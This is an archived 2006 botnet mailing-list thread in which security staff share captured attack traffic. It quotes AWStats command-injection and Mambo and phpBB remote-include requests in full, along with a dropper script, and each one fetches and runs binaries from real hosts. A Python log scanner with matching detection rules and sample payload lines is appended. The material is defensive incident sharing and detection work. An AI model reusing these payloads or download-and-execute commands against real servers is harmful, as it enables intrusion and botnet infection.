To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------

Pink--

Identical script here over the last couple of days. ISS Proventia calls this HTTP_AWStats_ConfigDir_Exec

(configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo| )

This signature coincides with another with ISS nomenclature HTTP_Spyki_PhpInclude_Worm

Script is:

_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo|

Sources are:
211.99.203.228, 83.16.125.3, 83.14.3.45, 85.10.195.19, 83.64.188.67, 80.50.64.94, 80.55.211.182, 212.78.135.49, 83.14.239.2, 24.167.98.232, 80.222.61.159

Larry Kettlewell
Chief Information Security Officer
Kansas State Government

-----Original Message-----
From: PinkFreud [mailto:[EMAIL PROTECTED]]
Sent: Thursday, March 16, 2006 9:59 PM
To: Jamie Riden
Cc: [email protected]
Subject: Re: [botnets] web remote include path

To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------

This looks like more of LordNikon's handiwork.

On Fri, Mar 17, 2006 at 08:51:40AM +1300, Jamie Riden babbled thus:
> This seems to be quite popular at the moment.
>
> Around Wed 8th March, I saw a drop using this method, described here -
> http://members.lycos.co.uk/jamieriden/mambo-exploit-obfuscated.pdf
>
> Probably not news to most of you, but I was surprised at how many
> different computers were involved - 216.63.z.z - initiator, 66.98.a.a
> - server hosting the defacing tool, 216.99.b.b - machine we get the
> first stage payload from, 217.160.c.c - machine that we connect back
> to and 219.96.d.d - machine we get the second stage payload from.
>
> Anyway, this morning we're back to the usual shell script -
>
> #!/bin/bash
> wget 209.200.224.166/foc
> chmod 744 foc
> ./foc
> wget 209.200.224.166/iron
> chmod 744 iron
> ./iron
>
> Where 'iron' has the following strings in the binary:
>
> GET %sawstats.pl?configdir=|echo;echo%%20YYY;cd%%20%%2ftmp%%3bwget%%2083%%2e16%%2e187%%2e6%%2fcacti%%3bchmod%%20%%2bx%%20cacti%%3b%%2e%%2fcacti;echo%%20YYY;echo| HTTP/1.1
> Host: %s
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
> /index.php?option=com_content&do_pdf=1&id=1
> GET %sindex.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%%20/tmp;wget%%2083.16.187.6/cacti;chmod%%20744%%20cacti;./cacti;echo%%20YYY;echo| HTTP/1.1
> Host: %s
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
> GET %sadmin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%%20/tmp;wget%%2083.16.187.6/cacti;chmod%%20744%%20cacti;./cacti;echo%%20YYY;echo| HTTP/1.1
>
> and 'foc' looks like the IRC bot.
>
> Note cmd.gif is the same or similar to a tool the Philippine Honeynet
> project describes as
> "'Defacing Tool 2.0 by r3v3ng4ns' is a suite of php based scripts
> that allows the attacker to send commands to the server primarily with
> the intent to deface websites."
>
> cheers,
> Jamie

--
PinkFreud
Chief of Security, Nightstar IRC network
irc.nightstar.net | www.nightstar.net
Server Administrator - Blargh.CA.US.Nightstar.Net

Unsolicited advertisements sent to this address are NOT welcome.

_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
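The three probes quoted in this thread (the AWStats configdir pipe, the Mambo mosConfig_absolute_path remote include and the phpBB phpbb_root_path remote include) all leave a recognisable shape in a web server's access log regardless of which host the payload is fetched from, which is what a defender should key on rather than on the source addresses listed above. The following is an added example, not code from any poster on the list: a small access-log scanner that percent-decodes each request URI until stable and runs it against rules for those three shapes plus a generic download-and-execute chain. The log format (Apache combined), the rule names, and the sample log lines are my own constructions; the IP addresses in the samples are documentation-range placeholders, not the addresses from the thread.

```python
import re
from urllib.parse import unquote

# Apache "combined" access-log format; only the fields we need are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Each rule is (name, regex) and is run against the fully percent-decoded URI.
# Rule names are constructed for this example, not IDS signature names.
RULES = [
    # AWStats: configdir handed a leading pipe, so the script runs a shell command
    ("awstats-configdir-exec", re.compile(r'awstats\.pl\?.*configdir=\|', re.I)),
    # Mambo/Joomla: mosConfig_absolute_path pointed at a remote URL (remote include)
    ("mambo-mosconfig-rfi", re.compile(r'mosConfig_absolute_path=(https?|ftp)://', re.I)),
    # phpBB: phpbb_root_path pointed at a remote URL (remote include)
    ("phpbb-root-path-rfi", re.compile(r'phpbb_root_path=(https?|ftp)://', re.I)),
    # Generic follow-on: a cmd= parameter carrying a fetch-then-chmod chain
    ("download-exec-chain", re.compile(r'cmd=.*(wget|curl)\s+\S+.*;.*chmod', re.I)),
]


def decode_uri(uri, max_rounds=3):
    """Percent-decode until the string stops changing (bounded), so that the
    %2f/%2e/%3b encoding used by the AWStats probe and any double-encoded
    variant both collapse to the same plain text before the rules run."""
    prev, cur = None, uri
    for _ in range(max_rounds):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur


def parse_line(line):
    """Return the named fields of one combined-format log line, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def match_rules(uri):
    """Return the names of every rule that matches the decoded request URI."""
    decoded = decode_uri(uri)
    return [name for name, rx in RULES if rx.search(decoded)]


def scan_log(text):
    """Return [(source_ip, [rule names])] for each line that trips a rule."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        names = match_rules(rec["uri"])
        if names:
            hits.append((rec["ip"], names))
    return hits


# Constructed sample log: three probe lines shaped like those in the thread
# (payload host replaced by the placeholder 203.0.113.5) and two benign lines,
# one of them a legitimate AWStats request that must not trigger.
SAMPLE_LOG = """\
192.0.2.10 - - [17/Mar/2006:09:12:01 +1300] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20203.0.113.5%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo| HTTP/1.1" 200 1530 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.0.2.11 - - [17/Mar/2006:09:12:03 +1300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.0.113.5/cmd.gif?&cmd=cd%20/tmp;wget%20203.0.113.5/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 200 812 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.0.2.12 - - [17/Mar/2006:09:12:05 +1300] "GET /forum/admin/admin_styles.php?phpbb_root_path=http://203.0.113.5/cmd.dat?&cmd=cd%20/tmp;wget%20203.0.113.5/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
198.51.100.7 - - [17/Mar/2006:09:13:10 +1300] "GET /index.php?option=com_content&do_pdf=1&id=1 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.8 - - [17/Mar/2006:09:13:12 +1300] "GET /cgi-bin/awstats.pl?config=example.com&year=2006 HTTP/1.1" 200 22000 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, names in scan_log(SAMPLE_LOG):
        print(f"{ip}: {', '.join(names)}")
```

The rules deliberately match on the parameter being abused (a pipe in configdir, a URL scheme in an include-path parameter) rather than on a download host or a marker string such as YYY, because the thread itself shows the same request shapes pointed at several different hosts; the decode-until-stable step is what keeps the AWStats rule working whether the probe encodes the slash and dot or sends them plain.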
